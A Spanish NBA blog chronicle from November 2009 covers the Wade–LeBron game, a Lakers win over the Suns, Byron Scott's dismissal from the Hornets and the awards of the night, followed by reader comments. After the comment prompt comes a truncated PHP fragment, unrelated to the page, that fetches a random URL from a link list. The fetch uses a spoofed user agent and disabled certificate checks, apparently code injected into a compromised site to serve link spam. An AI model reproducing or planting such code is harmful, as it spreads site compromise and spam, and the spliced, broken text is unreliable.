La Crónica (12/11/09)

13 de November de 2009 por txusma

Noche de jueves, noche de delicatessen baloncestísticos.

Wade vs LeBron y con Jordan de testigo. Saltaron chispas en un duelo que, individualmente, terminó en tablas. Fueron los secundarios los que tenían que decidir, y por ahí Cleveland tiene mejor fondo ropero. De Beasley ayer poco tenemos que decir pues también se vio afectado por la presencia motivadora del 23 de los Bulls, pero los tiradores Richardson, Cook, Chalmers o Arroyo fracasaron estrepitosamente. No así los escuderos del 23  de los Cavaliers, encabezados por Sweet Mo. Por ahí comenzó a desequilibrarse el partido. La alegría, con todo, no fue completa en el equipo. Varejao, además de perder su puesto de titular en favor de Hickson, se llevó un póster en todos los morros de Wade que pasará a la historia y que se verá obligado a rememorar a través de los medios hasta quedarse ciego de verlo repetido. Mal día para levantarse con el pie izquierdo, Anderson, nosotros te apoyamos.

Con todo, el ganador moral de la noche, como así está siendo de momento toda la temporada, fue “The Black Mamba”. Demasiado fácil ganaron los Lakers sin Gasol al que, hasta ahora, había sido el mejor equipo del Oeste. Mal presagio que Nash únicamente diera 5 asistencias de un total de 12 de su equipo, por 36 de L.A. cuya circulación fue demoníaca. Kobe y Bynum se bastaron para dar buena cuenta de unos Suns en los que fallaron todos los titulares, dejando el partido en manos de gente como Dudley, Admunson o Clark. Se crecen los que afirman que los Suns están poco preparados para dar guerra en los playoffs a pesar de su buen comienzo. Siempre que se clasifiquen, claro. Tampoco os perdáis ojo, un nuevo vuelo estratosférico de Shannon Brown. Otro animal.

Por cierto, la noticia del día es la destitución de Byron Scott como entrenado de los Hornets. El horrible inicio de temporada de New Orleans, tanto en lo estadístico como en la imagen, ha pasado factura a un técnico que hace sólo 2 temporadas era nombrado técnico del año. Unido a “diferencias filosóficas” con algunos jugadores, en palabras de David West, ha provocado su despido fulminante. Veremos si ésta es la solución a los males de los Hornets.

PREMIOS

MVP: Ganaron los Cavs y el mejor fue Lebron James (34 puntos, 4 rebotes y 7 asistencias). Ganaron los Lakers y el mejor fue… Andrew Bynum, que se puso las botas con el juego interior de Phoenix. 26 puntos, 15 rebotes y 3 tapones para él.

Rookie: Aprovechando el baño que los Lakers le pegaban a los Suns, Alvin Gentry le dio minutos a Earl Clark y este respondió con unos interesantes 10 puntos y 8 rebotes. No hay que perderles de vista para el futuro.

Sorpresa: 2 sorpresas en los 2 equipos que ganaron anoche. Por un lado Josh Powell demostrando que, si bien no es Gasol, es perfectamente válido para tener minutos en Los Angeles, y por el otro JJ Hickson que salió de titular desplazando a Varejao y anotó 18 puntos.

Decepción: 2 de 15 en 21 minutos para Amare Stoudamire y los Suns arrollados. No hace falta decir nada más.

Esfuerzo en vano: Miami perdió a pesar de la oposición de Wade y Beasley, las principales armas ofensivas de los de Florida.

RAZONES PARA TRASNOCHAR

9 partidos se disputan la próxima madrugada, y entre todos ellos uno centrará nuestra atención: la reedición de las últimas Finales de Conferencia Oeste, Lakers-Nuggets, con el morbo añadido que supone cada visita de Kobe a Colorado. Los angelinos llegan sin Pau pero embalados tras recuperar a Bynum y arrasar anoche a los Suns, mientras que los de George Karl firman un inicio de temporada de lo más irregular: tras 5 victorias seguidas, suman ahora 3 derrotas en los últimos cuatro partidos. Será a las 4h30. Pero hay más: el Hawks-Celtics (a las 2h00, con el recuerdo de la eliminatoria de 1ª ronda de 2008) y el debut de Jeff Bower como head coach de los Hornets, ante la nueva y hasta el momento existosa versión de los Blazers con 2 bases. Será a las 2h00 pero lo podremos ver en Cuatro a partir de las 3h00.

VÍDEOS

Dwyane Wade empotrando a Varejao contra el protector de la canasta.


Shannon Brown y su vuelo sin motor. Fijáos hasta donde levanta el balón.

Comenta

11 comentarios a esta entrada

  1. M dice:
    #1

    Madre mía, que bueno…aunque Varejao quizá debería haberse puesto más adelante…pero claro, visto lo visto, es fácil decirlo ahora. El de Brown mola y quizá sea más plástico, pero el otro es una potencia descomunal puesta en acción.

      Citar

  2. Óscar dice:
    #2

    Se acabó la racha de los Suns… ganar en el Staples habría sido demasiado.
    El inicio de temporada ha sido espectacular para los de Gentry, aunque ayudados por el calendario favorable de los 5 primeros partidos, lo que les ha valido para coger la dinámica positiva y llegar a un 8-1… hasta ayer. Difícil será ya que no se clasifique para playoffs, cuando en la porra no dábamos demasiado por ellos. Lo mejor de la noche, la actuación de Clark (éste sí se llama Earl..).
    La noticia del cese de Byron Scott no me la esperaba, al menos tan pronto. Pocos mimbres y decisiones al menos discutibles sobre la configuración de la plantilla desde 2008… Pero sí es verdad que la sensaciones que daban estos Hornets no parecían muy buenas, parecían sin alma o sin objetivos claros… A ver si no se cumple esta noche en el NOH vs. POR lo de “a entrenador nuevo…”. Me da mala espina…
    Otro que también se llama Earl es la “lentejita” Boykins, que afortunadamente ha vuelto a la NBA con los Wizards, que han cortado (para siempre en la LIga?) a Paul Davis.
    Interesante lo que contaba ayer Marca.com sobre la franquicia capitalina : “Manute Bol (de 1985 a 1988 y en la 1993/94), Georghe Muresan (1993/94 y 1995/97), Tyrone Bogues (1987/88) y Earl Boykins, recientemente fichado por los Wizards, son los dos jugadores más altos y más bajos de la NBA y tienen en común haber jugado en Washington en las fechas que aparecen entre paréntesis.
    Con el reciente fichaje de ‘Lentejita’ cierran esa curiosa historia: el sudanés y el rumano miden 2,31 metros, mientras que la talla de Bogues es 1,60 y la de Boykins, 1,65.”.
    Yo creo sinceramente que es un buen fichaje, necesitaban un base de ese perfil. Pero lo de las lesiones contínuas ya es para mirárselo…

      Citar

  3. Love Denise dice:
    #3

    creo que la destitucion de scott, provocara que este sea el entrenador de Lakers cuando Phil se retire.

    muy bueno los 2 mates.
    Me gsuta más la norma FIBA de pitar los pasos de salida, me duelen los ojos cuando veo cosas como la caminata que se pega Brown antes de ahcer el mate, pero bueno, supongo que será cuestión de gustos

      Citar

  4. Óscar dice:
    #4

    Y lo del vuelo de Shannon Brown no sorprende nada, ya ha hecho cosas “peores” esta misma temporada. A mí ya me encantaba en los Bobcats, es un jugador enorme en físico, intensidad y defensa. No entiendo como nadie le ha ofrecido más que los 2 millones justos que le ha firmado LAL este verano como agente libre… Quien dijese que iba “de relleno” en el intercambio Radmanovic-Morrison es simplemente porque no lo había visto jugar… No era el caso del “Maestro Zen”.

      Citar

  5. sergio dice:
    #5

    Que vivan Wade y Brown y la madre que los pario!! (a cada uno)

      Citar

  6. kantonyo dice:
    #6

    Hola Oscar, en otro post te preguntaba, seguro que no lo has visto por el flujo de comentarios del blog, pues eso que te preguntaba que te parecia el rendimiento de Outlaw!!…. yo buscaba un cambio ahora que todavia tiene un cache….

      Citar

  7. sergio dice:
    #7

    Voy a atreverme a decir los, para mi, mejores mates de la historia ya que Don Dwayne ha hecho lo que ha hecho. ( no cuento en All-Stars)

    Shawn Kemp vs. NYK
    Julius Erving vs. LA
    Tom Chambers vs. NYK
    Darryl Dawkins vs. no se… el de Kansas City Kings no… el segundo destrozo de tablero.
    Bryant vs Yao Ming
    Stackhouse vs no se… estaba en North Carolina aun
    Vince en NJ vs. Alonzo Mourning en MIA
    Julius Erving vs. NYK?
    LeBron vs. Dallas
    Vince Carter vs MIL
    Vince Carter vs ATL (Manute Bol para ser exactos)
    Vince Carter vs Dallas
    Vince Carter vs LA (este me puede)
    Adam Waddell ¬¬
    Darvin Ham en Texas Tech (porque este jugo en el C.B. Granada jaja)
    Poooor supuesto Vince Carter a Weis!!
    y http://www.youtube.com/watch?v=xrY4hWuyA_U , http://www.youtube.com/watch?v=vR2XFpaoOxo

    No os perdais esto por favor…. http://www.youtube.com/watch?v=mrJ3x5uaz-c

      Citar

  8. TheDeerHunter dice:
    #8

    ¿Manute Bol frente a Vince?? no me cuadra, Sergio
    por cierto, ¿has cambiado algo en tu mensaje?? porque te daba como spam… será que el sistema no quiere que ganes el próximo trivial

      Citar

  9. sergio dice:
    #9

    Joder… y tanto que no t cuadra… como que era Dikembe Mutombo. Lo peor es que no me he molestado en asimilar la burrada jaja. No se porque el otro dia me dijo que el mensaje esperaba moderacion o algo asi.

      Citar

  10. Óscar dice:
    #10

    Buenas Kantonyo, perdona pero estoy liao estos días y no lo había visto…
    Bueno, sobre Outlaw es complicado hablar, ya sabes. Al acabar la temporada pasada, en una sección de The Oregonian siempre opinan (opinamos) los fans y se habla de quién tiene que irse y a quién hay que fichar, casi todos apoyaban su marcha, sobre todo por las series que hizo vs. Houston, donde no estuvo nada bien, como sabes. Además, acaba contrato al final de 2010 y parecía una pieza interesante para algún “trade”, sobre todo por un “4” backup para LaMarcus. Al final, nada.
    A mí es un jugador que me gusta, pero es siempre imprevisible, irregular. Aporta para la segunda unidad la anotación que necesita el equipo, y lo que destaco es que siempre busca sus tiros, no se esconde en ese papel que tiene. Juega tanto de “3” como de falso “4”, posición en la que jugará más este año con Webster, Rudy o Batum, cuando vuelva. Eso sí, si empieza enchufado es un arma siempre importante.
    Lo que menos me gusta de él es la poca visión de juego o la escasa capacidad para tomar siempre las decisones correctas, por lo que se precipita bastante. En eso ha progresado poco desde que llegó de High School. Su perfil dice que es un tipo muy normal, y que suma más que resta en el ambiente del vestuario. Ese es otro punto a su favor.
    Si me preguntas si lo traspasaría, te diría que no. Es más, yo lo renovaría desde ya, simplemente porque a pesar de sus defectos, no sobran jugadores en la NBA con esa capacidad atlética, producción inmediata desde el banco, versatildad y valentía para asumir la responsabilidad cuando el equipo lo necesita.

    Saludos.

      Citar

  11. kantonyo dice:
    #11

    Posiblemente Sergio, te pregunte eso por los enlaces, al poner enlaces creo que necesita moderación.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>